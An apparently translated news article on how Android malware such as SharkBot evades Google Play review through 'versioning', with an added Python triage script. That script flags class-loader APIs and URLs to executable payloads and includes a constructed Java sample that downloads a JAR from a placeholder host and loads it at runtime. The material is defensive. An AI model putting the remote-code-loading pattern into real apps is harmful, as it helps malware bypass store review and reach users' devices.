How does malware get into Google Play? Google responds
With this method, hackers bypass Google Play’s security controls by publishing different versions of legitimate apps and then releasing their malware through them.
Google’s security team has described a common tactic called versioning, through which hackers bypass Google Play’s review and security controls and deliver malware to users’ Android devices.
In this technique, hackers spread malware either through updates to already installed apps or by downloading malicious code from servers under their control. Google explains:
“One of the ways hackers try to bypass Google Play’s security controls is versioning. Versioning occurs when a developer has released an early version of an app on Google Play that appears legitimate and has been verified by our reviews. But then it receives an update from a third-party server that modifies the code on the end-user’s device and enables its malicious activities.”
Google further points out that apps that engage in such activities violate Google Play’s deceptive behavior policy and can be labeled as backdoors.
According to current Google Play guidelines, apps published through the service cannot modify, replace, or update themselves using any method other than the official update mechanism provided by Google. These apps are also prohibited from downloading executable code (such as .dex, .jar, or .so files) from external sources.
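The policy above gives a defender a concrete static-triage heuristic: an app that both references a runtime class loader and carries a URL ending in one of the banned executable formats deserves manual review. The following Python script is an added example, not Google’s review logic; the indicator list, the sample "updater" source and the domain update.example.invalid are all constructed for illustration.

```python
import re

# Heuristic indicators of runtime code loading (assumed list for this example).
LOADER_APIS = (
    "dalvik.system.DexClassLoader",
    "dalvik.system.PathClassLoader",
    "dalvik.system.InMemoryDexClassLoader",
    "System.load(",
)
# URLs pointing at the executable formats the policy names (dex, JAR, .so) plus APK.
PAYLOAD_URL = re.compile(r"https?://[^\s\"'<>]+?\.(?:dex|jar|so|apk)\b", re.IGNORECASE)

def scan_source(text: str) -> dict:
    """Scan decompiled source text and return the indicators found plus a verdict.

    'dynamic-code-from-network': loader API and a URL to an executable payload
    'dynamic-code-local':        loader API but no remote payload URL
    'clean':                     neither
    """
    loaders = sorted(api for api in LOADER_APIS if api in text)
    payload_urls = sorted({m.group(0) for m in PAYLOAD_URL.finditer(text)})
    if loaders and payload_urls:
        verdict = "dynamic-code-from-network"
    elif loaders:
        verdict = "dynamic-code-local"
    else:
        verdict = "clean"
    return {"loaders": loaders, "payload_urls": payload_urls, "verdict": verdict}

# Constructed sample: skeleton of an "update" routine that fetches a JAR from a
# developer-controlled server and loads it outside the Play update channel.
SAMPLE_UPDATER = '''
import dalvik.system.DexClassLoader;
public class Updater {
  static final String URL = "https://update.example.invalid/v2/patch.jar";
  void apply(Context c) {
    File f = download(URL, c.getCodeCacheDir());
    new DexClassLoader(f.getPath(), null, null, getClass().getClassLoader());
  }
}
'''
# Constructed sample: a bundled native library, which is normal and not a violation.
SAMPLE_BENIGN = 'public class Native { static { System.loadLibrary("crypto"); } }'

if __name__ == "__main__":
    for name, src in (("updater", SAMPLE_UPDATER), ("benign", SAMPLE_BENIGN)):
        print(name, scan_source(src))
```

A loader API without a payload URL is not proof of abuse, since plugin frameworks and hot-fix SDKs use the same classes; the verdict only ranks what to look at first.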
Malware that uses this technique in Google Play
Google also points to a specific malware family called SharkBot, first discovered in 2021 by Cleafy’s intelligence team, which uses the same technique. SharkBot is a banking trojan that, after infiltrating Android devices, conducts unauthorized money transfers through the Automated Transfer Service (ATS) protocol.
The hackers behind SharkBot release versions with limited functionality on Google Play to hide the dubious nature of their apps. Once the user installs the trojanized app, however, they receive the full version of the malware.